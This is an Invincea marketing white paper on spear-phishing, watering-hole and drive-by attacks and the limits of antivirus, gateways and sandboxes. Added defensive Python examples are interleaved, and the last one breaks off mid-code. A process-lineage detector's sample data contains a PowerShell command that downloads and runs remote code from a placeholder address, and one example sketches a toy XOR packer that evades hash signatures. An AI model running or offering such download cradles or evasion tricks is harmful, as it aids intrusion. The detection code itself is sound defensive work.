Spear-Phishing, Watering Hole and Drive-By Attacks: The New Normal
Secure the primary vulnerability exploited by your adversaries – protect every employee

DETECTION | PREVENTION | INTELLIGENCE

3975 University Drive, Suite 460, Fairfax, Virginia 22030 | 1-855-511-5967 | Invincea.com | @invincea
Executive Summary

The news over the past 18 to 24 months proves one alarming fact: the single largest threat your organization faces today is network breach. Your employees have become the primary target of a diverse set of motivated adversaries bent on one objective: penetrating your network to gain access to sensitive information, including financial data, research and development activities, intellectual property, and personally identifiable information on your clients and employees.

Today's most successful and common attack vectors involve tricking your users into opening the door to your network. Spear-phishing, watering hole attacks and drive-by downloads are the new normal. The adversary gains entry by enticing your employees to click on links and open document attachments; every time they go to the Internet or open the email client, they put your company at risk. The techniques used by your adversaries include:

- Spear-phishing emails that deliver the employee to malicious websites running drive-by download exploits, or that carry weaponized document attachments
- Watering hole attacks that hijack legitimate, trusted sites to push malware to unsuspecting users
- Poisoning search results behind trending news items on popular engines such as Google, Yahoo! and Bing
- Pushing malware through popular social networks such as Twitter and Facebook

Your organization is under a state of constant and sustained attack, and every employee represents a potential point of weakness in your security strategy. Innovation in endpoint security is a critical need. New approaches to insulate the employee against these attacks are required, and Invincea is the solution.
Diverse Adversaries – Common Objectives – Massive Gains

Your adversaries range from nation states seeking to steal government secrets and intellectual property, to organized cyber criminals seeking to perpetrate financial fraud and identity theft, to hacktivists seeking to disclose your secrets in the public eye in an effort to shame your organization. Regardless of the actor, the common denominator is that your employees are the entry point. For nation states and cyber criminals the motivation is clear: massive financial gain on the back of your long-term investments.

"Cyber-crime's estimated cost is more than that of cocaine, heroin, and marijuana trafficking put together."
Khoo Boon Hui, President, Interpol

Page 2
No One is Immune

The question from business leaders to their security teams was once "Can this happen to us?" The news over the past 18-24 months has answered that question with an emphatic "Yes... no one is immune." Every organization is at risk of cyber breach. Depending on the size of the organization, the industry, and the geographic footprint, the adversarial focus may vary. Small and medium sized businesses are most at risk from organized cyber criminals. Enterprises and governments face threats from all three of the main adversarial categories: nation states, cyber-crime, and hacktivists. The Hackmageddon blog covers the motives of adversaries and their targets, and includes a detailed graphic timeline of hacking incidents categorized by month in 2012.

Below are a few real-world examples of recent attacks against a wide cross section of industries. The sad reality is that this list is not all-inclusive, as there are simply too many examples to cite.

- Spear-phishing attack against RSA
- Spear-phishing attack against Oak Ridge National Laboratory
- Spear-phishing attacks against global energy companies ("Night Dragon")
- Spear-phishing attacks against dozens of industries ("Operation Shady RAT")
- Spear-phishing attacks against The Wall Street Journal, Washington Post and New York Times
- Watering hole attacks against Facebook, Twitter and Apple
- Watering hole attacks against the U.S. Departments of Labor and Energy
- Drive-by download attack using the popular site Speedtest.net
- Drive-by download attack using major Washington D.C. area radio station websites
- Hacktivist attack against Sony PlayStation Network
- Spear-phishing attacks against private firms, think tanks and government organizations
- Spear-phishing attacks against gas pipeline firms
- Cyber-crime attacks against small and medium sized businesses

Assessing the Cost of Data Breach

The Ponemon Institute's "2012 Cost of Cyber Crime" report places the cost of data breach at an average of roughly $8.4 million.
A hefty sum to be sure; however, recent disclosures are even more alarming. When considering the risk of a breach, look at the following:

- $66 million in losses at RSA, The Security Division of EMC
- $171 million in losses suffered at Sony for the breach of the Sony PlayStation Network
According to an anonymous source in the U.S. Intelligence community quoted in this Washington Post report, attacks by nation states in the past two years have resulted in:

o Loss of $100 million worth of insecticide research
o Loss of $400 million worth of chemical formulas
o Loss of $600 million worth of proprietary electronics data

"Trade secrets developed over thousands of working hours... are stolen in a split second."
Robert "Bear" Bryant, National Counterintelligence Executive

The User as the Unwitting Accomplice

We live in a constantly connected world, and every employee in your organization has multiple ways to access your network. They have free rein over the Internet to aid in productivity and are always connected to the email client, day or night, at work or home. Your adversaries know this and use it to their advantage. They also know that, despite all of the effort you expend attempting to train your users to make good security decisions, a well-crafted attack has a high likelihood of success. Every employee in the organization is a potential unwitting accomplice to breach, from the intern to the chief executive. Why? The adversaries also know that internal network security is virtually non-existent. With access to, and residency on, a single machine, they can move laterally to seek out the keys to your kingdom.

Looking at the FY 2011 investigations figures released by the United States Computer Emergency Readiness Team (US-CERT), it is clear that the employee is the primary target. Combining phishing and malicious-website incidents (i.e. attacks that go through an employee), roughly 58% of the incidents reported to US-CERT in FY 2011 involved direct attacks against the employee.

Total Incidents Reported to US-CERT, FY 2011

Category                          Incidents    Share
Phishing                             55,153    51.2%
Virus/Trojan/Worm/Logic Bomb          8,236     7.7%
Malicious Website                     6,795     6.3%
Non Cyber                             9,652     9.0%
Policy Violation                      7,927     7.4%
Equipment Theft/Loss                  6,635     6.2%
Suspicious Network Activity           3,527     3.3%
Attempted Access                        863     0.8%
Social Engineering                    2,573     2.4%
Others                                6,294     5.8%
Total                               107,655   100.0%

(Source: US-CERT FY 2011 Investigations)

Fighting an Uphill Battle

When it comes to defending against today's adversaries, the burden typically falls on under-armed, overworked IT and Information Security teams. Shrinking budgets, limited human resources, sprawling workloads, a lack of innovative new solutions from trusted vendors, and constant push-back from the business to minimize any change to employee workflow all work against these teams in their fight to protect your organization. Combine these challenges with the fact that your adversaries are well funded, well staffed, motivated, and constantly evolving their techniques, and it is little wonder that the pace of breaches keeps increasing.

Your IT and Information Security teams need help. They need new solutions that meet the demand of the business to keep the employee productive while protecting every employee from becoming an unwitting accomplice to breach. Unfortunately, the adversary has you outnumbered. This is not a problem that can be addressed by scaling your internal team; every one of your employees is a potential target. It demands a technology solution that helps the internal security team identify the adversary without ceding the network to breach.

Wash-Rinse-Repeat: The Security Insanity Cycle

Against the backdrop described above, these teams often find themselves in a game of "Whac-A-Mole" with your adversaries. The wash-rinse-repeat cycle of infection, detection, remediation, and patching of the vulnerability used to penetrate your network is what Invincea calls the "Security Insanity Cycle."
The fundamental problems with this reality are threefold:

1. Infections are usually detected months or years after the fact, meaning the damage is long since done and the adversary has had ample time to both colonize the network and steal sensitive data.

   "In over half of the incidents investigated, it took months – sometimes even years – for this realization to dawn."
   Verizon Business Data Breach Investigations Report, 2012

2. Dollars spent on remediation reach into the millions: unbudgeted costs that hit the bottom line and add to the overall cost of network breach. Moreover, these millions are spent after the damage is done; they do nothing to protect your organization.

3. While your teams are fighting the newly discovered fire, the adversary continues to attack other parts of the organization. This is where the "Whac-A-Mole" analogy comes into play. Your adversaries are persistent: while you clean up one attack, they have already pivoted and are launching others against you.
The Great Malware Arms Race

One significant reason your teams are at a severe disadvantage is that many of the technologies they rely upon are reactive. Most require a list of known-bad malware or websites in order to detect or block anything. These technologies no longer hold up against adversaries who continuously morph their code to change its signature while standing up and tearing down websites on an hourly basis. Consider the following when looking at the ability of signature-based defenses to protect your organization:

- Malware authors are producing roughly 80,000 new variants per day (McAfee).
- Malware authors increasingly use polymorphic techniques, in which malware mutates itself to evade signatures.
- The endpoint has effectively become the new perimeter and anti-virus (AV) is the primary endpoint security solution, yet an alarming (though somewhat dated) Cyveillance study shows that AV vendors detect less than 19% of attacks on average.

Why Current Defenses Fall Short

What we need to understand when looking at our defensive strategies is that, for all intents and purposes, the user has become the new perimeter. As we have moved to an always-on, increasingly mobile lifestyle, we have changed the security paradigm. It has evolved from protecting assets that sit statically behind our layered defenses to protecting those assets wherever they may be at any given point in time. If we accept the ample evidence that the employee is the primary target, then we must also protect his or her computing device. To further support this assertion, consider two recent examples of adversaries targeting employees on the road:

- Popular iBAHN wireless hotel network attack (December 2011)
- IC3 warning of attacks through hotel wireless networks (May 2012)
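The arms-race bullets above rest on one mechanic: a signature keyed to a file's bytes is defeated by any change to those bytes. The following Python is an added example, not Invincea's code and not real malware. It builds a toy polymorphic packer (a constructed two-byte marker plus an XOR key, standing in for a real decoder stub, applied to a constructed stand-in payload string) and shows that every key yields a distinct SHA-256, so a hash list needs one entry per variant, while a check that undoes the transform before matching catches all of them. The marker bytes, payload text and key range are assumptions made for the example.

```python
import hashlib

# Constructed stand-in for a malicious payload body. Not real malware.
PAYLOAD = b"STAND-IN PAYLOAD: drop implant, beacon to c2, persist"

# Constructed two-byte marker for the toy packer's decoder stub; the byte
# after it is the XOR key. A real stub is code and is itself randomized.
STUB_MARKER = b"\xeb\x0e"


def make_variant(key: int) -> bytes:
    """Emit one polymorphic variant: identical payload, different XOR key.
    Every key changes every payload byte, so every variant hashes differently."""
    if not 1 <= key <= 255:
        raise ValueError("key must be 1..255")
    return STUB_MARKER + bytes([key]) + bytes(b ^ key for b in PAYLOAD)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def count_distinct_hashes(keys) -> int:
    """How many blocklist entries a hash-based AV would need for these keys."""
    return len({sha256(make_variant(k)) for k in keys})


def hash_detector(known_hashes: set, sample: bytes) -> bool:
    """Signature check as a reactive AV does it: exact hash against a list."""
    return sha256(sample) in known_hashes


def unpacking_detector(sample: bytes) -> bool:
    """Generic check: recognise the stub, undo the transform, then look for
    the payload content. Catches every key the hash list has never seen."""
    if len(sample) < 3 or not sample.startswith(STUB_MARKER):
        return False
    key = sample[2]
    decoded = bytes(b ^ key for b in sample[3:])
    return b"drop implant" in decoded


if __name__ == "__main__":
    known = {sha256(make_variant(0x41))}      # the one sample the vendor saw
    fresh = make_variant(0x42)                # tomorrow's variant
    print("distinct hashes for 255 keys:", count_distinct_hashes(range(1, 256)))
    print("hash list catches fresh variant:", hash_detector(known, fresh))
    print("unpack-then-match catches it:   ", unpacking_detector(fresh))
```

The unpack-then-match step stands in for what emulation, heuristics and behavioural monitoring do at different cost. Because the attacker also controls the stub, the marker check here is as brittle as any other static signature once the stub is randomized too, which is the page's point.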
Assessing the Power of Anti-Virus

Anti-virus (AV) software is inherently reactive: it can only recognize malicious code it has already seen, so it discovers infections after they occur and misses new variants. Typically only a handful of the 40+ AV products will know about a given piece of malware. Again, this is because more than 80,000 new malware variants are released into the wild every day and malware writers now use polymorphic techniques to constantly avoid detection.

Some AV offerings now feature heuristic patterning, in which threats are grouped and analyzed according to common characteristics. However, heuristics are deployed sparingly by the AV companies because they are prone to false positives, which can cause severe damage to a system if a system file is quarantined in error.

Some AV vendors augment resident signature repositories with a real-time, cloud-based service to reduce the time it takes to identify threats and push updates to customers. However, the fundamental approach remains unchanged. These tools still stop only known threats, so they miss the most sophisticated elements of the threat landscape.

Assessing the Power of Firewalls

One traditional way of protecting the enterprise is to build a wall around the castle: a network firewall. However, firewalls are designed to stop inbound connections to services that should not be offered outside the organization. In the context of a Web browser or email client, firewalls are ineffective, since they block only unsolicited inbound traffic, and browser malware arrives in the responses to outbound Web page requests that the firewall allows. Likewise, email attachment based attacks reach employees through the mail flow the firewall permits if the malware is unknown to the AV scanners running at the perimeter. The bad actor doesn't need to penetrate the network; the user pulls the malware in from the inside.
Firewalls obviously maintain a role in a layered defense, as they prevent inbound attacks against ports and services that should not be exposed to the outside. Also, if an attack occurs at the network layer, firewalls and filtering proxies can block the connection and prevent the attack from compromising other machines within the enterprise. It just isn't enough against today's threats, especially if we accept the assertion that the endpoint is the new perimeter.

Assessing the Power of Web Gateways

Web gateway solutions like Blue Coat, Websense, and those offered by some of the major AV vendors selectively block Web content from known malicious sources. Their effectiveness revolves around the ability to proactively blacklist untrusted sites or, more restrictively, to allow users to visit only certain whitelisted sites, so that when a user clicks a link the gateway can prevent the browser from reaching the site. Like AV solutions, Web gateways need to know what is bad beforehand in order to stop your employees from accessing it. Gateways deliver a broader solution than AV because they can blacklist IP addresses and URLs, but they still play cat and mouse with the adversary. It just isn't enough against today's threats.
Consider the complexity of maintaining an accurate whitelist and blacklist for your Web gateway in light of some recent news:

- 30,000 new malicious sites stood up on a daily basis
- "Lizamoon" attack infects millions of legitimate websites
- Amnesty International website hijacked to push malware
- High-ranked sites hijacked and blacklisted by Google

Assessing the Power of Application Whitelisting

While application whitelisting is effective at preventing standalone malware executables from running, most attacks exploit known, trusted applications, including the browser, document readers, and document editors. Microsoft Internet Explorer, Adobe Reader and, increasingly, Microsoft Office are the most vulnerable, most targeted, and most widely used applications on the desktop. These applications present a rich environment for attackers to find and exploit vulnerabilities. They also provide fertile ground for adversaries to dupe users into clicking on links and opening documents. As malware exploits those applications, the cyber adversary gains a foothold in the enterprise through the whitelisted application. The malware has access to that machine, the data on that machine, and every network resource to which that machine is connected.

A paper presented at ShmooCon 2012 entitled "Raising the White Flag" detailed the security gaps in leading whitelisting tools, including:

- ActiveX controls
- PDF documents
- Office documents
- Shellcode injection
- Java
- JavaScript
- Browser exploits
- Browser extensions
- Scripting
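The gap list above amounts to one observation: once an exploit is running inside winword.exe or acrord32.exe, an allowlist that judges binaries by path or hash sees nothing wrong, and the next stage (a shell, a script host, rundll32) is itself an allowlisted, signed Windows binary. The detection that does catch this looks at process lineage rather than process identity. The following Python is an added example, not Invincea's or any product's code: it runs over constructed Sysmon-style process-creation events (JSON lines; the field names, hosts, paths, command lines and allowlist contents are assumptions for the example) and contrasts what an allowlist would block with what a parent/child rule flags.

```python
import json

# Document handlers and browsers: allowlisted, and exactly what gets exploited.
TRUSTED_CONTENT_HANDLERS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "acrord32.exe", "iexplore.exe",
}
# Signed, built-in Windows binaries an allowlist also permits, commonly
# abused as the second stage once a content handler is exploited.
LIVING_OFF_THE_LAND = {
    "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}
# An assumed enterprise allowlist: OS components plus approved applications.
ALLOWLIST = TRUSTED_CONTENT_HANDLERS | LIVING_OFF_THE_LAND | {
    "explorer.exe", "svchost.exe", "splwow64.exe",
}

# Constructed Sysmon-like process-creation records (Event ID 1 fields). Not
# real telemetry: hosts, paths and command lines are made up, and the
# download address is RFC 5737 documentation space.
SAMPLE_EVENTS = r"""
{"UtcTime": "2013-04-17 14:02:11", "Image": "C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "WINWORD.EXE /n \"C:\\Users\\jdoe\\Downloads\\Q1_invoice.doc\""}
{"UtcTime": "2013-04-17 14:02:19", "Image": "C:\\Windows\\splwow64.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE", "CommandLine": "C:\\Windows\\splwow64.exe 12288"}
{"UtcTime": "2013-04-17 14:02:23", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE", "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')\""}
{"UtcTime": "2013-04-17 14:05:02", "Image": "C:\\Windows\\System32\\rundll32.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"}
{"UtcTime": "2013-04-17 14:09:44", "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AcroRd32.exe", "CommandLine": "cmd.exe /c copy %TEMP%\\svc.exe %APPDATA%\\svc.exe"}
{"UtcTime": "2013-04-17 14:11:30", "Image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\dropper.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "dropper.exe"}
"""


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list:
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def allowlist_verdicts(events: list) -> list:
    """What a path/hash allowlist decides: block only images not on the list.
    Returns the images it would have blocked."""
    return [basename(e["Image"]) for e in events
            if basename(e["Image"]) not in ALLOWLIST]


def suspicious_lineage(events: list) -> list:
    """Behavioural rule: a content handler spawning a shell, script host or
    other living-off-the-land binary is an exploit symptom, regardless of
    whether both binaries are allowlisted."""
    alerts = []
    for e in events:
        parent, child = basename(e["ParentImage"]), basename(e["Image"])
        if parent in TRUSTED_CONTENT_HANDLERS and child in LIVING_OFF_THE_LAND:
            alerts.append({"time": e["UtcTime"], "parent": parent,
                           "child": child, "cmdline": e["CommandLine"]})
    return alerts


if __name__ == "__main__":
    evts = parse_events(SAMPLE_EVENTS)
    print("allowlist would block:", allowlist_verdicts(evts))
    for a in suspicious_lineage(evts):
        print(f"ALERT {a['time']} {a['parent']} -> {a['child']}: {a['cmdline']}")
```

On the constructed events the allowlist blocks only the standalone dropper, while the Word-to-PowerShell and Reader-to-cmd spawns, both chains of allowlisted binaries, pass it and are caught only by the lineage rule. The Word-to-splwow64 spawn (Word's print helper) shows why the child set has to be curated: a bare "Office spawned something" rule would be noisy.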
Not surprisingly, these attacks involve exploiting both the existing vulnerabilities and the extensions and plug-ins of whitelisted applications, including the browser and document readers and editors. This includes scripting languages, shellcode, Java, interpreters, and vulnerabilities in the applications themselves. Unfortunately, these are the most common real-world exploits. Most exploits work by using a spear-phish either to direct the user to click on a link or to get the user to open an attachment. Users also get infected through more opportunistic methods like poisoned search engine results or simply browsing the Web. It is not unusual for malware to leverage a browser vulnerability to inject itself directly into the memory of a running process, such as an operating system service. In all of these cases the exploited or infected process has been whitelisted and is therefore allowed to run with its full, normal privileges.

Assessing the Power of Network-Based Malware Detection

Recently there has been a push for perimeter security solutions that promise to perform behavioral analysis of content using virtual machines. However, there are fundamental limitations to this approach, based on content analysis and scalability, and it has already been circumvented by several countermeasures, some of them quite simple.

Network Boundary Limitations for In-Line Analysis

The fundamental limitation on deployments in practice is that the network appliance becomes the bottleneck for all inbound content. While deep packet inspection (DPI) technologies have progressed to in-line inspection at gigabit speeds, DPI devices do pattern matching on hardware optimized for matching network streams against known attack patterns, i.e. signature matching against known threats.
Network appliances that attempt to run content in a virtual machine (VM) at the network boundary before passing it on face a fundamental limitation: unacceptable latency for each session or content type that must be analyzed before the content reaches the user. To do in-line monitoring with a VM-based technique, you will nominally need to create a VM for each session, and likely for each content type. For instance, if a user browses to a website and the device attempts to determine whether that website is malicious, it will also need to browse to the website and attempt to observe any malicious behavior. The latency of doing this proactively is clearly infeasible, so at best the device determines the site is malicious while the breach is happening or after it has occurred. As another example, when analyzing the content attached to an email, a VM must be created for each content type. If the email carries a PowerPoint, a Word document, and a .zip archive with executable programs inside, then a VM must be created for each of these content types, and that is for a single email to a single user. Significant scalability issues arise with this approach:

1. Scaling to the number of users
2. Scaling to the number of sessions and emails per user
3. Scaling to content types
4. Scaling to versions of software for each content type (e.g., Adobe 8.x, Adobe 9.x) to determine whether a vulnerability is being exploited
5. Scaling within acceptable latency bounds for delaying delivery of content

Points 1, 2, and 3 set a requirement for a certain number of VMs per user in your organization, based on the network sessions they have and the content types involved. Point 4 exacerbates this problem severely, because most exploits are specific both to a particular version of the application that handles the content type and to the operating system that runs the application. In other words, an in-line solution will need to include every version of every application/operating system combination present within the network to determine whether it may be exploited by the untrusted content.

The final point, Point 5, is extremely difficult to overcome because it cannot be solved with hardware. The adversary can introduce arbitrary delays before running malicious code. For instance, when a Word or PDF document is opened, the malicious code may choose to wait 15 or 20 minutes before running. Some exploits we have observed in practice require a system reboot before the malicious code runs. Finally, delivering content in a compressed, encrypted, or password-protected archive whose password or key is shared with the user (typically in the body of the email) defeats in-line approaches, simply because the content cannot be scanned at the gateway. These tactics are all within the control of the adversary and make in-line analysis of content fundamentally unscalable.

In addition to all these drawbacks, hardware isn't cheap. With a robustly configured server, you can host at least 64 and at best 128 virtual machines. Once you do the math on how many simultaneous virtual machines need to be created for your users, how many sessions will take place, and which content types will be used, this approach becomes unscalable and uneconomical quite rapidly.
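The last evasion above, a password-protected archive with the password in the email body, is one a gateway can at least recognize even though it cannot inspect the content. The following Python is an added example, not Invincea's or any appliance's code: it builds constructed sample archives with the standard library, marks one as encrypted by setting the ZIP encryption flag bit (the bytes are not really encrypted; this only makes it look password-protected to any ZIP reader), and then triages archives the way a gateway policy might, returning "cannot_scan" for encrypted entries or excessive nesting so the decision to quarantine or hand off to the endpoint is explicit instead of silently passing uninspected content. The extension and magic-byte checks are simple heuristics, and the nesting limit and compression-ratio threshold are assumed values.

```python
import io
import zipfile

LOCAL_SIG = b"PK\x03\x04"       # local file header signature
CENTRAL_SIG = b"PK\x01\x02"     # central directory header signature
ENCRYPTED_FLAG = 0x0001         # bit 0 of the general-purpose flag
OOXML_EXTS = (".docx", ".xlsx", ".pptx")   # zip containers that are documents
MAX_DEPTH = 3                   # assumed policy: archives nested deeper are opaque
MAX_RATIO = 100                 # assumed policy: uncompressed/compressed above this


def build_zip(entries: dict) -> bytes:
    """Constructed sample archive from {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def mark_encrypted(zip_bytes: bytes) -> bytes:
    """Set the 'encrypted' bit on every entry in the local headers and the
    central directory. Only for building a test sample: the content stays
    in the clear, but every ZIP reader will now demand a password for it."""
    data = bytearray(zip_bytes)
    off = 0
    while data[off:off + 4] == LOCAL_SIG:
        data[off + 6] |= ENCRYPTED_FLAG
        comp_size = int.from_bytes(data[off + 18:off + 22], "little")
        name_len = int.from_bytes(data[off + 26:off + 28], "little")
        extra_len = int.from_bytes(data[off + 28:off + 30], "little")
        off += 30 + name_len + extra_len + comp_size
    while data[off:off + 4] == CENTRAL_SIG:
        data[off + 8] |= ENCRYPTED_FLAG
        name_len = int.from_bytes(data[off + 28:off + 30], "little")
        extra_len = int.from_bytes(data[off + 30:off + 32], "little")
        comment_len = int.from_bytes(data[off + 32:off + 34], "little")
        off += 46 + name_len + extra_len + comment_len
    return bytes(data)


def assess_archive(zip_bytes: bytes, depth: int = 0) -> dict:
    """Gateway-side triage of one archive. Verdicts:
    'cannot_scan' - an entry is password-protected or nested too deeply, so
                    no content inspection (AV, detonation) can reach it;
    'suspicious'  - fully readable, but carries a PE executable or an
                    extreme compression ratio;
    'scannable'   - every byte can be handed to downstream inspection."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(zip_bytes))
    except zipfile.BadZipFile:
        return {"verdict": "malformed", "findings": ["not a valid zip"]}
    findings = []
    with zf:
        for info in zf.infolist():
            name = info.filename
            if info.flag_bits & ENCRYPTED_FLAG:
                findings.append(f"encrypted entry: {name}")
                continue                       # zf.read() would need a password
            if info.compress_size and info.file_size / info.compress_size > MAX_RATIO:
                findings.append(f"extreme compression ratio: {name}")
            data = zf.read(info)
            if data[:2] == b"MZ":
                findings.append(f"PE executable: {name}")
            if data[:4] == LOCAL_SIG and not name.lower().endswith(OOXML_EXTS):
                if depth + 1 >= MAX_DEPTH:
                    findings.append(f"nesting too deep: {name}")
                else:
                    inner = assess_archive(data, depth + 1)
                    findings.extend(f"{name} -> {f}" for f in inner["findings"])
    if any("encrypted entry" in f or "nesting too deep" in f for f in findings):
        verdict = "cannot_scan"
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "scannable"
    return {"verdict": verdict, "findings": findings}


if __name__ == "__main__":
    locked = mark_encrypted(build_zip({"invoice.pdf": b"%PDF-1.4 constructed sample"}))
    outer = build_zip({"readme.txt": b"see attached", "inner.zip": locked})
    print(assess_archive(outer))
```

The point of the explicit "cannot_scan" verdict is that the appliance's limitation becomes a policy input: block, strip, or route to the endpoint where the archive is eventually opened, rather than let the unscanned content through as if it had been inspected.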
As a result, the market quickly concluded that running this class of solution, which inspects inbound content via virtualization at the network perimeter, is infeasible. Because in-line analysis has become untenable, these devices are now being configured to examine outbound connections only. What this means in practice is that the device looks at outbound connections (primarily HTTP) to determine whether an internal machine is communicating with a known command and control network. In this case the device has simply become another pattern-matching machine driven by the latest lists of known botnet command and control networks. Likewise, where the virtualization-based behavioral analysis is abandoned, the device often falls back to comparing signatures of content such as executable files against known malicious signatures. Unfortunately this means the device has become another in a long list of security appliances that are reactive and can only detect known threats.

If the detection efforts fail, the effort becomes the post facto discovery of the malware that has taken root in the IT infrastructure. Network colonization by the adversary and the network remediation required to address it can be very expensive, typically costing seven figures to rid the network of an infection.
A final point to consider with network boundary devices is the case of the mobile user outside the network. When this user is simply online on the road or at home, not VPN'd into the corporate network, they bypass any protection provided by network perimeter devices. With the expansion of the mobile workforce and personal email services, this is becoming a significant risk for enterprise security managers.

The Invincea Solution

Invincea addresses the gaps left by other security solutions by protecting the most important attack surface in the enterprise: the employee. Invincea employs application virtualization to create a protective "bubble" around applications that handle untrusted content, including Web browsers, PDF readers, the Office suite, .zip archives and .exe files. We protect users against both known and zero-day malware delivered via spear-phishing, watering holes, drive-by downloads, social networking worms, fake anti-virus and other online threats. By creating secure virtual containers and running each of these applications in its own virtual environment on the endpoint, Invincea has created an enterprise "airlock" that seals the attack vector off from the endpoint and prevents lateral movement in your network.

Endpoint Security Software

Invincea deploys as a lightweight Windows application, licensed on a subscription basis with flexible renewal options to meet your specific needs. The application can protect your users against all untrusted content by moving browsers, PDF readers, the Office suite, .zip files and executables into a contained, virtual environment. You simply tell us which applications you want protected and we turn on the virtual environment to support them. The endpoint solution deploys quickly and easily, just as you would push any Windows-based application.
Threat Intelligence Appliance

To gather the rich pre-breach forensic intelligence your teams need on thwarted attacks, the Invincea platform also includes our Threat Data Server, which is licensed and available on-premise as a physical or virtual appliance or as a cloud-based service. The Threat Data Server is built with scalability in mind, which means you won't have to rack and stack large amounts of new gear.
How it Works

Containment

Invincea takes the most highly targeted applications in your network (the Web browser, PDF reader, Office suite, .zip files, executables) and seamlessly runs them in secure virtual containers. Every time the Web browser is opened, or whenever an attachment arrives from outside the network, Invincea creates a segregated environment for these applications to operate in. By creating this specialized virtual environment, Invincea contains all malware, zero-day or known, and prevents it from attacking the host operating system as a pathway to breach and lateral movement in your network.

Detection

Unlike other solutions, Invincea does not rely on malware signatures for detection. Instead, it automatically identifies malware attacks based on behaviors and actions inside the contained, controlled, and isolated environment. As a result, Invincea can detect zero-day attacks in real time and thwart them.
Prevention

Over the past few years we have been taught, by repeated assertion from those who benefit from remediation and network forensic professional services, that the breach cannot be stopped and that post facto detection is the new prevention. We can't blame our fellow security professionals for their cynicism, because the truth is that the prevention security industry has utterly failed us, our governments, corporations, and citizens. Reactive list-based approaches can no longer stop the threat; therefore the logical conclusion drawn and promulgated is that you can only attempt to detect the intruder already in your network. Perhaps this conclusion was accurate at the time, but with the innovations delivered by Invincea's breach prevention platform it no longer holds.

When we detect an infection inside our contained environment, we immediately alert the user, discard the tainted environment, and rebuild it to a clean gold state within 20 seconds. We also capture rich forensic detail on the attack and feed it on to your broader security infrastructure.

Intelligence: The Invincea Threat Data Server

Not only do we detect and prevent breaches, we capture rich forensic intelligence on every attempted attack at the point of detection and feed it to other leading security technologies. The primary value Invincea delivers is that we actually stop the attack at the point of detection. We take every one of your users and put them in an environment that protects them from spear-phishing, drive-by downloads, poisoned search engine results, malicious websites, hijacked sites, and so on. We take it one step further: we turn your users into part of an enterprise-wide malware detection network. The instant malicious activity is detected in the Invincea breach prevention platform, we begin collecting forensic information.
We isolate and identify:

- Infection Source: the URL, PDF attachment, Office attachment, .zip, or .exe file that triggered the infection
- Timeline of Attack: the actions of the malware, what it did when it opened, how it unpacked, how it cleaned up after itself, and so on
- Registry Changes: every change the malware attempted to make to the registry
- Connections: any and all connections, inbound or outbound, showing you the command and control channels the adversary attempted to create

This information is fed to the Invincea Threat Data Server, where it is integrated with your Security Information and Event Management (SIEM) system and presented to your teams in a single interface. Understanding that you need a way to push this information on to the rest of your infrastructure, we have integrated with a number of other leading security technologies, such as:

- McAfee ePO
- ArcSight
- Splunk
- Q1 Labs QRadar
- NetWitness
- ThreatGRID

The threat information, including command and control server IPs and domain names, combined with indicators of compromise including file names, hashes, and registry values, is matched against Invincea partners' threat intelligence feeds to provide adversarial attribution and cross-vendor intelligence on adversarial motives.
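Feeding one user's captured indicators (the infecting URL, the C2 domains and IPs) to the rest of the infrastructure comes down to a mechanical step: normalizing them into a block decision that every other user's request is checked against. The following Python is an added example, not Invincea's Threat Data Server or any SIEM integration: it normalizes a constructed indicator set, matches it against constructed Squid-style proxy log lines, and reports which requests would have been blocked. The indicator record format, the log format, the hostnames and the addresses (RFC 5737 documentation space, example.* domains) are all assumptions. File hashes in the feed are carried through but not matched here, since a proxy log has no file hash to compare.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed indicator set of the kind the page describes: infecting URL,
# C2 host and address, file hash. Values are made up (example.* domains and
# RFC 5737 address space); the record format is an assumption.
CAPTURED_INDICATORS = [
    {"type": "url",    "value": "http://cdn-update.example.net/dl/reader_update.exe"},
    {"type": "domain", "value": "Beacon.Example.org"},
    {"type": "ip",     "value": "203.0.113.45"},
    {"type": "sha256", "value": "0" * 64},   # placeholder hash, not matched here
]

# Constructed Squid-style access log lines: time, client, result, method, URL.
SAMPLE_PROXY_LOG = """\
1366214530.102 192.0.2.10 TCP_MISS/200 GET http://www.example.com/news/index.html
1366214531.488 192.0.2.10 TCP_MISS/200 GET http://cdn-update.example.net/dl/reader_update.exe
1366214590.001 192.0.2.22 TCP_MISS/200 GET http://beacon.example.org/ping?id=22
1366214595.310 192.0.2.22 TCP_MISS/200 POST http://sub.beacon.example.org:8080/post
1366214601.777 192.0.2.31 TCP_MISS/200 CONNECT 203.0.113.45:443
1366214602.902 192.0.2.31 TCP_MISS/200 GET http://cdn-update.example.net/images/logo.png
"""


class Blocklist:
    """Indicators normalized into the three things a proxy can match on:
    exact URL (host + path), domain (including subdomains), literal IP."""

    def __init__(self, indicators):
        self.urls, self.domains, self.ips, self.hashes = set(), set(), set(), set()
        for ind in indicators:
            kind, value = ind["type"], ind["value"].strip()
            if kind == "url":
                parts = urlsplit(value.lower())
                self.urls.add((parts.hostname, parts.path or "/"))
            elif kind == "domain":
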